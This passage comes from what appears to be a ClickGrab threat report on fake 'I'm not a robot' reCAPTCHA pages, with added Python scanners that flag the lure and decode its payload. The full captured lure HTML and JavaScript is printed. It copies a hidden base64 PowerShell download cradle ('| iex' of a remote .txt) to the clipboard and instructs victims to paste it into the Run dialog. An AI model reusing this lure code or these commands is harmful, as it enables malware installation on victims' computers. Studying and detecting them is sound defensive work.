isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
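The JSON above is what ClickGrab derives from the captured page: a clipboard write (`document.execCommand("copy")` on a temporary textarea), the Win+R / Ctrl+V / Enter instructions, the fake reCAPTCHA wording, and a PowerShell string ending in `| iex`. The following Python scanner is an added example, not ClickGrab's own code, that applies those checks to a trimmed copy of the page captured above and pulls out the staged command. The check names, the verdict rule, and the trimmed sample page are my own construction.

```python
import re
from typing import Dict, Optional

# Constructed input: a trimmed copy of the fake reCAPTCHA page captured in the
# JSON above (www.thesignaturemag.salviatech.com), reduced to the markup and
# script lines the checks look at. The staged command is copied verbatim.
SAMPLE_HTML = """<!DOCTYPE html>
<html lang="en"><head><title>Verify You Are Human</title></head>
<body>
<p class="im-not-a-robot">I'm not a robot</p>
<p>To better prove you are not a robot, please:</p>
<ol>
 <li>Press & hold the Windows Key <i class="fab fa-windows"></i> + <b>R</b>.</li>
 <li>In the verification window, press <b>Ctrl</b> + <b>V</b>.</li>
 <li>Press <b>Enter</b> on your keyboard to finish.</li>
</ol>
<script>
function setClipboardCopyData(textToCopy){
  const tempTextArea = document.createElement("textarea");
  tempTextArea.value = textToCopy;
  document.body.append(tempTextArea);
  tempTextArea.select();
  document.execCommand("copy");
  document.body.removeChild(tempTextArea);
}
const commandToRun = `POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
setClipboardCopyData(commandToRun);
</script>
</body></html>"""

# Check name -> regex over the raw page (IGNORECASE | DOTALL). Hypothetical
# names; they mirror the ClipboardManipulation / SuspiciousKeywords /
# PowerShellDownloads fields of the report.
CHECKS = {
    "clipboard_write": r"execCommand\(\s*[\"']copy[\"']\s*\)|navigator\.clipboard\.writeText\(",
    "run_dialog_steps": r"windows\s*key.{0,120}?\+\s*(?:<b>)?\s*R\b",
    "paste_steps": r"ctrl\s*(?:</b>)?\s*\+\s*(?:<b>)?\s*V\b",
    "captcha_lure": r"I'?m not a robot|Verify You Are Human|not a robot",
    "powershell_literal": r"powershell(?:\.exe)?\s+[^`\"']{0,60}?-w(?:indowstyle)?\s+h",
    "iex_pipe": r"\|\s*iex\b|invoke-expression",
}

# A quoted/backticked string literal that starts with powershell and is
# terminated by a quote followed by ';' (the JS `commandToRun = \`...\`;` shape).
STAGED_RE = re.compile(r"[`\"']\s*(powershell(?:\.exe)?\b.*?)[`\"']\s*;", re.IGNORECASE | re.DOTALL)


def scan_html(page: str) -> Dict[str, object]:
    """Run every check; return a verdict and a short context snippet per hit."""
    hits: Dict[str, str] = {}
    for name, pattern in CHECKS.items():
        m = re.search(pattern, page, re.IGNORECASE | re.DOTALL)
        if m:
            start, end = max(m.start() - 30, 0), min(m.end() + 30, len(page))
            hits[name] = "..." + " ".join(page[start:end].split()) + "..."
    # ClickFix needs all three legs: the page writes the clipboard, the
    # written text is a PowerShell cradle, and the user is told to paste it.
    core = "clipboard_write" in hits and ("powershell_literal" in hits or "iex_pipe" in hits)
    social = "run_dialog_steps" in hits or "paste_steps" in hits
    if core and social:
        verdict = "clickfix"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "hits": hits}


def staged_command(page: str) -> Optional[str]:
    """Return the PowerShell command as the clipboard receives it, without the
    JS template-literal backtick and ';' that the report's sample lines keep."""
    m = STAGED_RE.search(page)
    return m.group(1).strip() if m else None


if __name__ == "__main__":
    report = scan_html(SAMPLE_HTML)
    print("verdict:", report["verdict"])
    for name, ctx in report["hits"].items():
        print(f"  {name}: {ctx}")
    print("staged:", staged_command(SAMPLE_HTML))
```

Run it against a page you have already fetched offline; the checks are deliberately loose on markup (bold tags optional, mixed case ignored) because the lure text is what the victim reads, and the `powershell_literal` check tolerates the `-W h` abbreviation that `powershell.exe` accepts for `-WindowStyle Hidden`.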
https://www.test.peperoncinochepassione.it/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
JSON Technical Data
{ "URL": "https://www.test.peperoncinochepassione.it/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=", "Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r", "ClipboardCommands": "PowErsHeLL -W hiddEn ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
https://mail.cambodiatouristservice.com/
Total findings: 2
Indicators of Compromise
Type | Value |
---|---|
URL | https://browser.certif-update.website/ |
URL | https://browser.certif-update.website/ |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://mail.cambodiatouristservice.com/", "URLs": [ "https://browser.certif-update.website/", "https://browser.certif-update.website/" ], "HTML": "<!DOCTYPE HTML>\r\n<html lang=\"en-US\">\r\n <head>\r\n <meta charset=\"UTF-8\">\r\n <meta http-equiv=\"refresh\" content=\"0; url=https://browser.certif-update.website/\">\r\n <script type=\"text/javascript\">\r\n window.location.href = \"https://browser.certif-update.website/\"\r\n </script>\r\n <title>Loading</title>\r\n </head>\r\n <body>\r\n\t </body>\r\n</html>", "ThreatLevel": "None" }
https://my.salviatech.com/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
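This sample is the same payload as the one on www.test.peperoncinochepassione.it above, and the www.thesignaturemag.salviatech.com sample differs only in its base64 blob and the abbreviated `-W h`. The report's Base64Strings/Decoded fields come from decoding the `FromBase64String` argument. The following Python triage is an added example, not ClickGrab's own code: it reproduces that decode for both captured payloads, normalizes the mixed-case launcher, flags the hidden-window switch, extracts the second-stage URL and emits rows in the layout of the report's IoC tables. The `-EncodedCommand` (UTF-16LE) handling is a generalization not exercised by anything on this page, and the regexes and field names are my own.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Constructed input: the two clipboard payloads this report captured, copied
# from the "Malicious Code Sample" lines. The trailing "`;" is the closing
# backtick and semicolon of the JavaScript template literal that builds the
# string on the lure page; PowerShell never sees it.
SAMPLES = {
    "thesignaturemag.salviatech.com": (
        'POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
        "'aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50'"
        ')) | iex"`;'
    ),
    "my.salviatech.com": (
        'PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
        "'aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ='"
        ')) | iex"`;'
    ),
}

LAUNCHER_RE = re.compile(r"^\s*(powershell(?:\.exe)?|pwsh(?:\.exe)?)\b", re.IGNORECASE)
# powershell.exe accepts abbreviated parameter values, so "-W h" and
# "-W hiddEn" both mean -WindowStyle Hidden.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)
B64_ARG_RE = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.IGNORECASE)
ENC_CMD_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)
CRADLE_RE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.IGNORECASE)


@dataclass
class Triage:
    launcher: Optional[str]
    hidden_window: bool
    stages: List[str] = field(default_factory=list)      # decoded inner commands
    urls: List[str] = field(default_factory=list)        # second-stage download URLs
    hosts: List[str] = field(default_factory=list)
    cradle_keywords: List[str] = field(default_factory=list)

    @property
    def is_download_cradle(self) -> bool:
        # "fetch a URL and hand the body to Invoke-Expression" is the whole lure
        return bool(self.urls) and ("iex" in self.cradle_keywords or "invoke-expression" in self.cradle_keywords)


def decode_stage(blob: str, encoding: str) -> str:
    # validate=True rejects blobs with stray characters instead of silently dropping them
    return base64.b64decode(blob, validate=True).decode(encoding)


def triage(command: str) -> Triage:
    m = LAUNCHER_RE.match(command)
    result = Triage(launcher=m.group(1).lower() if m else None,
                    hidden_window=bool(HIDDEN_RE.search(command)))
    # These samples wrap the blob in [Text.Encoding]::UTF8.GetString. The other
    # common shape, ::Unicode.GetString or -EncodedCommand, is UTF-16LE.
    utf16 = ENC_CMD_RE.search(command) or re.search(r"Unicode\.GetString", command, re.IGNORECASE)
    encoding = "utf-16-le" if utf16 else "utf-8"
    for blob in B64_ARG_RE.findall(command) + ENC_CMD_RE.findall(command):
        stage = decode_stage(blob, encoding)
        result.stages.append(stage)
        for url in URL_RE.findall(stage):
            result.urls.append(url)
            result.hosts.append(urlparse(url).hostname or "")
    text = command + " " + " ".join(result.stages)
    result.cradle_keywords = sorted({k.lower() for k in CRADLE_RE.findall(text)})
    return result


def ioc_rows(t: Triage) -> List[str]:
    """Rows in the same 'Type | Value |' layout as the report's IoC tables."""
    rows = [f"URL | {u} |" for u in dict.fromkeys(t.urls)]
    rows += [f"Domain | {h} |" for h in dict.fromkeys(t.hosts) if h]
    return rows


if __name__ == "__main__":
    for site, cmd in SAMPLES.items():
        t = triage(cmd)
        print(f"{site}: launcher={t.launcher} hidden={t.hidden_window} cradle={t.is_download_cradle}")
        for s in t.stages:
            print("  decoded:", s)
        for row in ioc_rows(t):
            print("  ", row)
```

The decoded stage is itself only a cradle (`iex (iwr '<url>' -UseBasicParsing).Content`); the real second stage lives at the extracted URL, so the URL and its host are the indicators worth blocking, and fetching them belongs in a sandbox, not on the analyst's workstation.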
JSON Technical Data
{ "URL": "https://my.salviatech.com/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=", "Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r", "ClipboardCommands": "PowErsHeLL -W hiddEn ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n 